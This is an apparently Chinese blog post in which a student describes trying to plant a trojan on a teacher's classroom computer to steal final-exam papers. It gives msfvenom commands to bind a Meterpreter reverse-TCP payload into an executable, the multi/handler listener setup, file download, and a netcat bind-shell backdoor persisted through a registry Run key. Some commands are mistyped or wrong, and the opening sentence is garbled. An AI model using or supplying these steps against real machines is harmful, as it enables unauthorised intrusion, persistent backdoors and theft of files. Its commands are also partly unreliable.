所有故事的开头总是那么荒谬。因为,对一个技术的可爱来说,期末考试临近了,但平时对自己是什么样的人有想法。(莎士比亚)。
在某个风寒日丽的下午,我正在上着课刷着手机(当然了这里可不能学我),然后看到了谋篇公众号的推文,是一篇关于通过写一个木马程序,窃取老师的期末试卷的文章,此时,我心中也产生了类似的想法,嘻嘻。通过作者的思路,作者是自己写的程序,等待老师的u盘插入,然后遍历老师的u盘指定的文件格式到自己的u盘。
经过一番思考后,决定现学现用,用msf生成的小马植入教室的电脑,进而获得目标电脑的权限,这里我想到的有两种思路:
1, 在上课老师来之前将小马植入电脑然后下课自动销毁,但是这样的作法有点危险,会有同学看到。或者入侵老师的电脑后上传nc然后进行反连。
2, 还有一种是自己的远控软件(狗头,不是本文的重点),重点是免杀。
Msf对于我们应该不陌生,重点是它怎么捆绑或者生成小马,本文介绍捆绑。首先我们得有一个目标软件。
然后执行命令
sfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.44.141 -f exe -x /home/zhengai/桌面 -o /home/zhengai/桌面
-p指的是使用的payload
-f 指的是输出的文件格式
-x -o 指的是输入文件路径和输出文件路径
LHOST=你自己的IP
这时可能会有帅气的读者问了,就这样裸奔吗?这样呢不怕被杀?像这样
当然了我们有免杀(狗头)。
如果你觉得麻烦想自己生成小马的话,思路也是一样的,只不过是直接去掉-x参数。当然了msf也集成了手机的payload,感兴趣可以试试哦。在实践之前我们先进行实验。
Msfconsole打开msf端
use multi/handler可以先进入模块
然后show options查看需要配置参数
这里看到只需要配置LHOST,这里有两种配置方法,可以是自己的ip,也可以是目标主机的ip但是的话此马只能在局域网内上线,不同的ip配置可以拿到不同的权限。这里我们直接配置目标主机的ip。
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.44.131
set lport 4444
run
最最最重要的是目标主机要运行你的小马,在实践中你可以有很多方法让目标主机运行,看你的能力了。然后我们就可以执行命令下载文件了。下载命令是download .更多有趣的命令等着你去挖掘。这里还可以给目标主机上传nc然后这就是你的电脑了哦,我们的目标是注册表,
Upload /roo C:\\windows\\system32
然后修改注册表键值
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'
OK了现在你只需要连接即可(狗头)。
但是最后计划还是失败了,因为教室的电脑只有老师才能打开。吐血。(打字不易,大佬喷轻一点)